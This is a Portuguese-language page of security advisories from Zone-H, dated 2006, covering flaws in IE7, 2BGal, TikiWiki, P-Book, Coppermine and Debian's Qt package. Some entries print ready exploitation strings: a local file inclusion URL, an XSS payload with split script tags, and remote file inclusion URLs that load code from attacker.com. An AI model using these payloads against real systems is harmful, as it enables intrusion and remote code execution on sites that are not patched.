Zone-H - Unrestricted Information - Avisos de Segurança

Avisos de Segurança

02 de novembro de 2006

A Positive Technoligies, informou hoje sobre uma falha de Stack Overflow no navegador da Microsoft, Internet Explorer 7.

A falha já foi reportada para o fabricante, e pode ser explorada através de códigos maliciosos em uma página mhtml.

Para mais informações Clique Aqui.

2BGal: Inclusão de Arquivos Locais

01 de novembro de 2006
Nome do Script: 2BGal Site do script: http://www.ben3w.com/multimedia/devphp_2bgal.php Versão Afetada: 3.0 Encontrado por Kw3[R]Ln Email: kw3rln[AT]rst-crew.net Exploração: http://www.site.com/[path]/admin/configuration.inc.php?lang=[Arquivo Local]

TikiWiki Versão 1.9.5 Sirius: XSS e divulgação de informação restrita

01 de novembro de 2006

Securfrog descobriu uma falha no TikiWiki Versão 1.9.5 Sirius no parâmetro de verificação "sort_mode" que permite, com que um usuário mal intencionado injete códigos arbitrários e veja informações restritas.

Os seguintes arquivos estão vulneraveis:

/tiki-listpages.php?offset=0&sort_mode=/tiki-lastchanges.php?days=1&offset=0&sort_mode=/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

Existindo também uma falha de XSS que pode ser explorada assim:

/tiki-featured_link.php?type=f&url="></iframe><scr</script>ipt>alert('XSS')</scri</script>pt><!—

P-Book: Inclusão de Arquivos Remotos

31 de outubro de 2006

Nome do Script: P-Book
Site do script: http://www.PPoPn.net
Versão Afetada: 1.17 e anteriores

Encontrado por Ahmad Maulana a.k.a Matdhule
Email: matdhule[at]gmail[dot]com

Exploração:
http://target.com/[p-book_path]/admin.php?pb_lang=http://attacker.com/inject.txt?

http://target.com/[p-book_path]/pbook.php?pb_lang=http://attacker.com/inject.txt?

Coppermine: Falha de Sql Injection

Por Marcelo Almeida (Vympel)

30 de outubro de 2006

Foi descoberto pelo time de desenvolvedores do Coppermine uma falha de sql injection que pode ser explorada para obter informações sensíveis do sistema afetado.

Os usuário devem editar o aquivo picmgr.php para remover o parametro incorreto e impedir este ataque.

Versão original:

	$aid = isset($_GET['aid']) ? ($_GET['aid']) : 0;

Troque para:

	$aid = isset($_GET['aid']) ? (int) $_GET['aid'] : 0;

Esta correção impede somente o ataque considerado mais grave. Outras falhas de menor perigo foram encontradas e poderam ser corrigidas executando o pacote de atualização.

Aviso original

DSA 1200-1: Atualização para pacote Qt corrige falha de integer overflow

Por Marcelo Almeida (Vympel)
30 de outubro de 2006
A Debian disponibilizou pacotes de atualização para a biblioteca qt-x11-free que corrigem uma falha de integer overflow que pode ser explorada remota e localmente. Lista de atualização e plataformas...
Leia mais...

Mais...

<< Início < Anterior 1 2 3 4 5 6 7 8 9 10 Próximo > Fim >>

Resultados 157 - 182 de 240

[Voltar]